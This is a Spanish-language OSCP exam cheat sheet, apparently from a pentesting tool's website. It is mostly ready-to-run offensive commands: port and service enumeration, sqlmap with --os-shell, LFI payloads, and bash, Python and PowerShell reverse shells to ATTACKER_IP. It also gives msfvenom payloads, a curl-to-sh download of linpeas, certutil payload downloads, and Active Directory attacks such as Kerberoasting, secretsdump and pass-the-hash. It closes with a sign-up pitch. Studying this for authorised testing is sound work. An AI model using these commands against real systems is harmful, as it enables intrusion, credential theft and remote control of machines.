# Enumeración
La enumeración lo es todo en el OSCP. Dedica el 80% de tu tiempo aquí. Escanea todos los puertos, enumera todos los servicios.
Nmap — Estrategia de escaneo completo
nmap -p- --min-rate=1000 -T4 TARGET_IP -oN ports.txt
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET_IP
nmap -sU --top-ports 200 --min-rate=1000 TARGET_IP
Enumeración Web
feroxbuster -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt,bak -t 50
whatweb http://TARGET && curl -s http://TARGET -I
nikto -h http://TARGET -C all
Enumeración SMB
smbclient -N -L //TARGET
enum4linux-ng -A TARGET
crackmapexec smb TARGET -u '' -p '' --shares
SNMP, LDAP, DNS
snmpwalk -v2c -c public TARGET 1.3.6.1.2.1
ldapsearch -H ldap://TARGET -x -b "DC=domain,DC=local" -s sub "(objectClass=user)" sAMAccountName
dig axfr @TARGET DOMAIN.LOCAL
# Explotación Web
Inyección SQL, bypass de upload, inyección de comandos — lo fundamental de las boxes web OSCP.
Inyección SQL
sqlmap -u "http://TARGET/page?id=1" --batch --dbs
sqlmap -r request.txt --batch --level 5 --risk 3 --os-shell
Bypass de subida de archivos
cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
Inyección de comandos
; whoami
Inclusión de archivos (LFI/RFI)
curl "http://TARGET/page?file=../../../etc/passwd"
curl "http://TARGET/page?file=php://filter/convert.base64-encode/resource=config.php"
# Shells y Payloads
Reverse shells, bind shells y generación de payloads — apréndetelos de memoria para el examen.
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"
Mejora del shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm && stty raw -echo; fg
Payloads Msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
# Escalada de privilegios Linux
El OSCP ama el privesc Linux. Comprueba SUID, capabilities, cron jobs, rutas escribibles, versión del kernel.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
find / -perm -4000 -type f 2>/dev/null
sudo -l
getcap -r / 2>/dev/null
cat /etc/crontab && ls -la /etc/cron*
find / -writable -type f 2>/dev/null | grep -v proc
uname -a && cat /etc/os-release
# Escalada de privilegios Windows
Servicios, tokens, AlwaysInstallElevated, rutas de servicios sin comillas, potatoes — los clásicos OSCP.
.\winPEASx64.exe
powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"
whoami /priv
.\GodPotato.exe -cmd "cmd /c whoami"
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows"
# Active Directory
AD es una parte importante del OSCP desde la actualización de 2023. Kerberoasting, AS-REP roasting, DCSync y movimiento lateral.
bloodhound-python -d domain.local -u USER -p PASS -c All -ns DC_IP
impacket-GetUserSPNs domain.local/USER:PASS -dc-ip DC_IP -request
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip DC_IP
impacket-psexec domain.local/ADMIN:PASS@TARGET_IP
impacket-secretsdump domain.local/ADMIN:PASS@DC_IP
evil-winrm -i TARGET_IP -u USER -p PASS
crackmapexec smb SUBNET/24 -u USER -p PASS --shares
# Pivoting y Tunneling
Alcanzar redes internas a través de hosts comprometidos. Chisel, túneles SSH, ligolo — imprescindible para OSCP.
Chisel (Recomendado)
./chisel server -p 8080 --reverse
./chisel client ATTACKER_IP:8080 R:socks
proxychains4 nmap -sT -Pn -p 445,3389,5985 INTERNAL_IP
Túneles SSH
ssh -L 8080:INTERNAL_IP:80 user@PIVOT_IP
ssh -D 1080 user@PIVOT_IP
# Ataques de contraseñas
Crackear hashes, fuerza bruta de logins — hashcat y John son tus mejores aliados.
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"
# Transferencia de archivos
Llevar herramientas al objetivo y exfiltrar datos. Múltiples métodos para diferentes situaciones.
Objetivos Linux
python3 -m http.server 8000
wget http://ATTACKER_IP:8000/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh
Objetivos Windows
certutil -urlcache -split -f http://ATTACKER_IP:8000/shell.exe C:\Windows\Temp\shell.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8000/shell.exe','C:\Windows\Temp\shell.exe')"
# Consejos para el examen OSCP
Estrategia y mentalidad para las 23h45 de examen. Estos consejos vienen de cientos de experiencias OSCP.
❓ Preguntas frecuentes sobre el OSCP
El examen OSCP es un examen práctico de 23h45. Incluye una cadena de Active Directory de 40 puntos y 3 máquinas independientes de 20 puntos cada una. Necesitas 70 puntos para aprobar. Es obligatorio un informe profesional entregado dentro de las 24 horas posteriores al examen.
La mayoría de herramientas de pentest comunes están permitidas: nmap, Burp Suite, sqlmap, Metasploit (limitado a una máquina), linpeas, winpeas, crackmapexec, impacket, BloodHound. La asistencia con IA está prohibida. La lista completa está en la guía de examen de OffSec.
La enumeración. El consenso de la comunidad OSCP es: si estás atascado, no has enumerado lo suficiente. Escanea los 65535 puertos TCP, revisa UDP, enumera cada servicio encontrado y lee el código fuente con atención.
La mayoría de los candidatos necesitan de 3 a 6 meses de práctica dedicada en plataformas como HackTheBox, TryHackMe y los labs OffSec PG Practice. La experiencia previa en Linux y redes reduce significativamente el tiempo de preparación.
El Kerberoasting es un ataque de Active Directory que solicita tickets de servicio para cuentas con SPN y los crackea offline. Usa impacket-GetUserSPNs para extraer los hashes y hashcat (-m 13100) para crackearlos con rockyou.txt.
En Linux: configuraciones sudo incorrectas, binarios SUID, abuso de tareas cron, rutas escribibles en PATH. En Windows: SeImpersonatePrivilege (Potatoes), rutas de servicio sin comillas, AlwaysInstallElevated, DLL hijacking. Ejecuta siempre LinPEAS/WinPEAS primero.
Sí, pero solo en una máquina durante todo el examen (incluido meterpreter). Elige con cuidado — resérvalo para una máquina donde la explotación manual llevaría demasiado tiempo.
OSCP+ es el itinerario de certificación actualizado de OffSec con módulos adicionales sobre ataques a Active Directory, pivoting avanzado y desarrollo de exploits. El formato del examen práctico de 23h45 es el mismo, pero los candidatos a OSCP+ necesitan habilidades de AD más sólidas para completar la cadena.
Pass-the-Hash usa un hash NTLM para autenticarse sin conocer la contraseña en texto plano. Usa impacket-psexec DOMAIN/user@TARGET -hashes :NTLM_HASH o evil-winrm -i TARGET -u user -H NTLM_HASH. Solo funciona contra autenticación NTLM, no Kerberos.
El patrón BOF de OSCP: 1) fuzzear para encontrar el crash, 2) hallar el offset exacto de EIP con msf-pattern_create/offset, 3) identificar los bad characters, 4) encontrar un gadget JMP ESP con !mona jmp -r esp, 5) generar el shellcode con msfvenom -p windows/shell_reverse_tcp -b BADCHARS -f python. Practica en la room Buffer Overflow Prep de TryHackMe.
📚 Recursos Relacionados
- Cheatsheet Nmap — Referencia completa de flags Nmap y técnicas de escaneo de red
- Cheatsheet Pentesting — 200+ comandos esenciales para cada fase del pentest
- Cómo Empezar en Pentesting — Metodología completa para aspirantes a pentester
- Glosario de Pentesting — 60+ términos de ciberseguridad definidos para hackers éticos
- Informe de Pentest OSCP — Estructura, plantilla oficial, secciones obligatorias y consejos para entregar a tiempo
Transforma tus hallazgos en un informe PDF profesional. La IA rellena CVE, CVSS y severidad automáticamente.
¿Quieres los 12.020+ comandos?
Esta cheatsheet es solo la superficie. Pentest Mindmap organiza 12.020+ comandos en 34 categorías con búsqueda instantánea y copia en un clic.
Crear una cuenta gratis →